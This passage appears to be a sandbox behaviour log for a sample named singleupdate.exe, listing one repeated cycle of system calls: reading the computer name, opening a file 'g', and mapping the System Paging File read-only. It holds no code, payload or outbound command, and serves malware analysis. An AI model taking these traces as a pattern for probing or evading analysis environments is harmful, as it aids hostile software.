| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
